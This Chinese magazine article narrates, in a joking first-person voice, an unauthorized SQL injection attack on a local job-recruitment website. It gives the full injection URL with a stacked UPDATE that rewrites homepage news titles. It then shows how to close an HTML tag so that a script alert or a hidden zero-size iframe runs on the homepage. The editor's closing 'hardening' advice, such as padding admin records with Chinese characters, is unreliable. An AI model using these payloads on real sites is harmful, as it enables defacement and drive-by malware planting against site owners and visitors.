网络安全 频道

小玩SQL注入 人才招聘网惨遭蹂躏

    编者按:SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户,从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序,对网站和访问该网站的网友都带来巨大危害。

    现实的年代,现在失业率那可是想当的高,每天人才市场一开门,那家伙,那场面,那是相当大呀!那真是:锣鼓喧天,鞭炮齐鸣,红旗招展,人山人海呀...

    于是就跑到网上投简历,叫朋友介绍了一个本地的人才网站,随便看了一看URL,在URL上加了“’”,冒出个“ [Microsoft][ODBC SQL Server Driver][SQL Server]字符串 ''11237'' order by regtime desc'' 之前有未闭合的引号。”的错误提示。再加了一个AND 1=1 和 AND 1=2 返回不同页面,经过初步判断,有注入的漏洞。呵呵,觉得自己太有才了!(小编:那是相当有才~~~)

    经过NBSI一顿乱扫,可以注入出表和字段,没找到管理员后台,DBO权限,却没路径,不能getwebshell。旁注不想看,我是来投简历的。不过,发现他站的首页的右下角,有显示新闻动态.有调用这些数据。

    我们只要修改库里的这个数据,就可以在他首页做点什么...我们来看看news的库,新闻嘛,再看看NBSI主他库的比较。不知道,细心的朋友,有没有发现我们注入的库,标题的字段是“title”。

    MSSQL,如果遇到MD5的后台,在不能破解的情况下可以UPDATE ,这里的文章,也是,首页调用文章的标题,我们update 掉的文章标题也是会在再首页显示的。

    UPDATE的语法:update 表名 set 字段='''' where 原字段=''xx'',我们把表名和字段,带入语法就OK了。

    提交入下注入语句;
http://26836659.blogcn.com/subjoin/corporation/infodetail.asp?id=388'';update+news+set+title=''混世魔王''+where+title=''北京市基本医疗保险规定''--

    我已经把网站改成了我BLOG地址.呵呵,随便做个广告.我们来首页看看这段代码。已经修改成功。我这里就不再截图了。


    这里只是个连接的,我们可以再改改。如果我们把标题修改成
。在首页显示就是

    这个<a href= > 给</a> 闭合了。那后面就可以执行N多代码了,先来个<script>alert("******")</script> ****表示要输入的内容。

    嘿嘿,来刷新一下首页,跨站提示框出来了。我们还可以改成
<iframe src="XXXX" width="0" height="0"> </iframe>嘿嘿,就到这里点到为止,发封mail给管理员吧。
                                                                  
    编者语:现在很多网站对程序大意,变量过滤不严格,对于这种情况我们可以对数据库修改表结构;然后修改管理员的账号字段的数据类型,文本型改成最大字段255(其实也够了,如果还想做得再大点,可以选择备注型),密码的字段也进行相同设置。对表进行修改,设置管理员权限的账号放在ID1,并输入大量中文字符(最好大于100个字),把真正的管理员密码放在ID2后的任何一个位置。通过以上的修改,网站的安全会大大的提高。

0
相关文章